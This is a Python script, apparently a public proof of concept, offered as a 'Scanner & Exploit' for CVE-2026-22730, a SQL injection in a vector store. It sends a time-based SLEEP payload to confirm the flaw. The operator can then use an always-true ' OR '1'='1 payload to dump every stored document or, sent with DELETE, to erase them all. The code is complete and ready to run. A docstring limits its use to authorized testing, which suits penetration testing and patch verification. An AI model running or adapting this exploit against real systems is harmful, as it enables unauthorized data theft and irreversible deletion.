#!/usr/bin/env python3
"""CVE-2026-22730 scanner: time-based SQL injection check for HTTP endpoints.

The script sends a baseline request and a ``SLEEP`` payload to a target URL,
compares response times, optionally sends a follow-up payload chosen by the
operator, and writes JSON/TXT/HTML reports to the current directory.

Run it only against systems you own or are explicitly authorized to test.
"""

import argparse
import html
import json
import sys
import time
from datetime import datetime
from urllib.parse import quote_plus, urlencode

import requests

BANNER = """
███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░  ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗  ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║  ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║  ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝  ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░  ░╚════╝░╚═╝░░╚═╝
CVE-2026-22730 Scanner & Exploit
SQL Injection in Spring AI's MariaDB Vector Store
Supports GET (query parameter) and POST (JSON body) with placeholder.
NULL200OK 💀🔥created by NABEEL 🔥💀
"""

# The banner is printed at import time, as in the original script.
print(BANNER)

# ---------------------------
# Configuration
# ---------------------------
DEFAULT_SLEEP = 5  # seconds for time-based detection
TIMEOUT = 10  # HTTP request timeout
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Marker for payload replacement in POST JSON
PAYLOAD_MARKER = "__PAYLOAD__"


# ---------------------------
# Helper Functions
# ---------------------------
def _build_json_body(json_template, value):
    """Substitute *value* for PAYLOAD_MARKER and parse the result as JSON.

    Returns the parsed object, or None (after printing a message) when the
    substituted text is not valid JSON.
    """
    body_str = json_template.replace(PAYLOAD_MARKER, value)
    try:
        return json.loads(body_str)
    except json.JSONDecodeError:
        print("[!] Invalid JSON template.")
        return None


def send_request(base_url, method, param_name, value, json_template=None):
    """Send one HTTP request carrying *value* and time it.

    GET sends *value* as the query parameter *param_name*. POST sends the
    JSON template with PAYLOAD_MARKER replaced by *value*. DELETE uses the
    JSON template when one is given, otherwise the query parameter.

    Args:
        base_url: Target URL without a query string.
        method: "GET", "POST" or "DELETE" (case-insensitive).
        param_name: Query parameter name for the query-string variants.
        value: The value to place in the parameter or template.
        json_template: JSON text containing PAYLOAD_MARKER; required for POST.

    Returns:
        ``(response, elapsed_seconds)`` on success, or ``(None, 0)`` when the
        method is unsupported, the template is missing or invalid, or the
        request raises ``requests.exceptions.RequestException``.
    """
    method = method.upper()
    if method not in ("GET", "POST", "DELETE"):
        print(f"[!] Unsupported method: {method}")
        return None, 0
    if method == "POST" and not json_template:
        print("[!] POST method requires --json-template with placeholder.")
        return None, 0

    headers = {"User-Agent": USER_AGENT}
    request_kwargs = {"headers": headers, "timeout": TIMEOUT}
    url = base_url

    if method == "POST" or (method == "DELETE" and json_template):
        body = _build_json_body(json_template, value)
        if body is None:
            return None, 0
        headers["Content-Type"] = "application/json"
        request_kwargs["json"] = body
    else:
        query = urlencode({param_name: value}, quote_via=quote_plus)
        url = base_url + "?" + query

    try:
        # perf_counter is monotonic, so wall-clock adjustments cannot skew
        # the measured duration.
        start = time.perf_counter()
        resp = requests.request(method, url, **request_kwargs)
        elapsed = time.perf_counter() - start
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None, 0
    return resp, elapsed


def detect_vulnerability(url, method, param, sleep_time,
                         baseline_value="nonexistent", json_template=None):
    """Compare a baseline request with a SLEEP payload request.

    Args:
        url: Target URL.
        method: HTTP method passed through to ``send_request``.
        param: Query parameter name passed through to ``send_request``.
        sleep_time: Seconds used in the SLEEP payload.
        baseline_value: Benign value used for the baseline request.
        json_template: Optional JSON template passed to ``send_request``.

    Returns:
        True when the payload request took noticeably longer than the
        baseline, False otherwise (including when either request failed).
    """
    print("[*] Sending baseline request...")
    resp1, time1 = send_request(url, method, param, baseline_value, json_template)
    if resp1 is None:
        print("[!] Baseline request failed. Exiting.")
        return False

    # SQLi payload that tries to inject a SLEEP
    payload = f"' OR SLEEP({sleep_time}) --"
    print(f"[*] Sending time‑based payload: {payload}")
    resp2, time2 = send_request(url, method, param, payload, json_template)
    if resp2 is None:
        print("[!] Payload request failed. Exiting.")
        return False

    print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s")

    # Allow 1s of network jitter, but never let the threshold drop to zero
    # or below: with sleep_time <= 1 the plain "sleep_time - 1" rule would
    # flag every target. For sleep_time >= 2 the threshold is unchanged.
    threshold = max(sleep_time - 1, sleep_time / 2)
    if time2 - time1 >= threshold:
        print("[+] Target appears VULNERABLE to SQL injection!")
        return True
    print("[-] Target does NOT seem vulnerable.")
    return False


def exploit_retrieve_all(url, method, param, json_template=None):
    """Send the always-true payload and return the response text.

    Returns an empty string when the request failed or the server answered
    with an error status.
    """
    payload = "' OR '1'='1"
    print(f"[*] Exploiting with payload (retrieve all): {payload}")
    resp, _ = send_request(url, method, param, payload, json_template)
    # A requests.Response is truthy only when its status is OK; the check is
    # spelled out so the "error status counts as failure" rule is visible.
    if resp is not None and resp.ok:
        return resp.text
    return ""


def exploit_delete_all(url, method, param, json_template=None):
    """Send the always-true payload with the DELETE method.

    The *method* argument is accepted for signature parity with
    ``exploit_retrieve_all`` but the request is always sent as DELETE.

    Returns the response text, or an empty string when the request failed or
    the server answered with an error status.
    """
    payload = "' OR '1'='1"
    print(f"[*] Exploiting with payload (DELETE all): {payload}")
    resp, _ = send_request(url, "DELETE", param, payload, json_template)
    if resp is not None and resp.ok:
        return resp.text
    return ""


def _render_html_report(timestamp, target_url, method, vuln_status,
                        exploit_data, exploit_type):
    """Build the HTML report, escaping every externally supplied value."""
    type_text = html.escape(str(exploit_type)) if exploit_type else "None"
    if exploit_data:
        # The response body comes from the scanned server and must not be
        # rendered as markup when the report is opened in a browser.
        result_text = html.escape(str(exploit_data))
    else:
        result_text = "No exploitation performed."
    return f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>CVE-2026-22730 Scan Report</title>
</head>
<body>
<h1>CVE-2026-22730 SQL Injection Scanner</h1>
<p><strong>Timestamp:</strong> {html.escape(str(timestamp))}</p>
<p><strong>Target URL:</strong> {html.escape(str(target_url))}</p>
<p><strong>HTTP Method:</strong> {html.escape(str(method))}</p>
<p><strong>Vulnerable:</strong> {vuln_status}</p>
<h2>Exploitation</h2>
<p><strong>Type:</strong> {type_text}</p>
<pre>{result_text}</pre>
</body>
</html>
"""


def save_results(data, target_url, method, vuln_status,
                 exploit_data=None, exploit_type=None):
    """Write the scan outcome to timestamped JSON, TXT and HTML files.

    Files are created in the current working directory and written as UTF-8.

    Args:
        data: Unused; kept so existing callers keep working.
        target_url: URL that was scanned.
        method: HTTP method used for detection.
        vuln_status: Result of the detection step.
        exploit_data: Response text of the follow-up request, if any.
        exploit_type: Label of the follow-up action, if any.
    """
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    base_filename = f"cve-2026-22730_{timestamp}"

    report = {
        "timestamp": timestamp,
        "target": target_url,
        "method": method,
        "vulnerable": vuln_status,
        "detection_method": "time-based SQL injection",
        "exploit_type": exploit_type,
        "exploit_result": exploit_data if exploit_data else None,
    }

    # JSON
    with open(f"{base_filename}.json", "w", encoding="utf-8") as f:
        json.dump(report, f, indent=4)
    print(f"[+] JSON report saved: {base_filename}.json")

    # TXT
    txt_lines = [
        "CVE-2026-22730 Scan Report\n",
        f"Timestamp: {timestamp}\n",
        f"Target: {target_url}\n",
        f"Method: {method}\n",
        f"Vulnerable: {vuln_status}\n",
    ]
    if exploit_type:
        txt_lines.append(f"Exploit performed: {exploit_type}\n")
    if exploit_data:
        txt_lines.append("\n--- Exploitation Result ---\n")
        txt_lines.append(exploit_data)
    with open(f"{base_filename}.txt", "w", encoding="utf-8") as f:
        f.writelines(txt_lines)
    print(f"[+] TXT report saved: {base_filename}.txt")

    # HTML
    html_content = _render_html_report(
        timestamp, target_url, method, vuln_status, exploit_data, exploit_type
    )
    with open(f"{base_filename}.html", "w", encoding="utf-8") as f:
        f.write(html_content)
    print(f"[+] HTML report saved: {base_filename}.html")


# ---------------------------
# Main
# ---------------------------
def _prompt_for_arguments(args):
    """Fill *args* in place from interactive prompts; exit on invalid input."""
    print("=== CVE-2026-22730 Scanner ===\n")
    args.url = input("Enter target URL: ").strip()
    if not args.url:
        print("[!] No target URL provided. Exiting.")
        sys.exit(1)

    args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
    if args.method not in ["GET", "POST"]:
        print("[!] Invalid method. Using GET.")
        args.method = "GET"

    if args.method == "GET":
        args.param = input("Enter query parameter name (e.g., department): ").strip()
        if not args.param:
            # Same requirement the command-line path enforces for GET.
            print("[!] GET method requires a query parameter name. Exiting.")
            sys.exit(1)
    else:  # POST
        args.param = (
            input("Enter a name for the injected field (optional, for reference): ").strip()
            or "payload"
        )
        args.json_template = input(
            "Enter JSON template with __PAYLOAD__ placeholder: "
        ).strip()
        if PAYLOAD_MARKER not in args.json_template:
            print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
            sys.exit(1)

    baseline_input = input(
        "Enter a benign value for baseline (default: nonexistent): "
    ).strip()
    if baseline_input:
        args.baseline = baseline_input

    sleep_input = input(
        f"Enter sleep time for detection (default {DEFAULT_SLEEP}): "
    ).strip()
    if sleep_input:
        try:
            args.sleep = int(sleep_input)
        except ValueError:
            print("[!] Invalid number. Using default.")


def _validate_cli_arguments(args):
    """Exit with a message when command-line arguments are inconsistent."""
    if args.method == "POST" and not args.json_template:
        print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
        sys.exit(1)
    if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
        print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
        sys.exit(1)
    if args.method == "GET" and not args.param:
        print("[!] GET method requires --param.")
        sys.exit(1)


def main():
    """Parse arguments (or prompt for them), run detection, save reports."""
    parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
    parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
    parser.add_argument("--method", default="GET", choices=["GET", "POST"],
                        help="HTTP method (default: GET)")
    parser.add_argument("--param",
                        help="Query parameter name (for GET) or marker name (for POST, optional)")
    parser.add_argument("--json-template",
                        help="JSON template with __PAYLOAD__ placeholder (required for POST)")
    parser.add_argument("--baseline", default="nonexistent",
                        help="Baseline value for normal request (default: nonexistent)")
    parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP,
                        help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
    args = parser.parse_args()

    # Interactive mode if arguments missing
    if not args.url:
        _prompt_for_arguments(args)
    else:
        _validate_cli_arguments(args)

    # A non-positive sleep makes the timing comparison meaningless.
    if args.sleep < 1:
        print("[!] Sleep time must be at least 1 second. Using default.")
        args.sleep = DEFAULT_SLEEP

    # Remove trailing slash if present
    args.url = args.url.rstrip("/")

    print(f"\n[*] Targeting: {args.url} with method {args.method}")

    # Step 1: Detection
    vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep,
                                args.baseline, args.json_template)

    exploit_data = None
    exploit_type = None

    # Step 2: Optional follow-up chosen by the operator
    if vuln:
        print("\n[?] Target is vulnerable. Choose exploitation option:")
        print(" 1. Retrieve all documents (SELECT injection)")
        print(" 2. Delete all documents (DELETE injection) - DESTRUCTIVE")
        print(" 3. Skip exploitation")
        choice = input("Enter 1, 2, or 3: ").strip()

        if choice == '1':
            exploit_type = "RETRIEVE_ALL"
            exploit_data = exploit_retrieve_all(args.url, args.method, args.param,
                                                args.json_template)
            if exploit_data:
                print("[+] Data retrieval completed.")
            else:
                print("[!] Exploit failed or returned no data.")
        elif choice == '2':
            print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
            confirm = input("Type 'yes' to confirm: ").strip().lower()
            if confirm == 'yes':
                exploit_type = "DELETE_ALL"
                exploit_data = exploit_delete_all(args.url, args.method, args.param,
                                                  args.json_template)
                if exploit_data:
                    print("[+] Delete request sent. Check response.")
                else:
                    print("[!] Delete exploit failed.")
            else:
                print("[*] Deletion cancelled.")
        else:
            print("[*] Skipping exploitation.")

    # Step 3: Save results
    save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)


if __name__ == "__main__":
    try:
        main()
    except (KeyboardInterrupt, EOFError):
        # Aborting at a prompt should not end in a traceback.
        print("\n[!] Aborted by user.")
        sys.exit(130)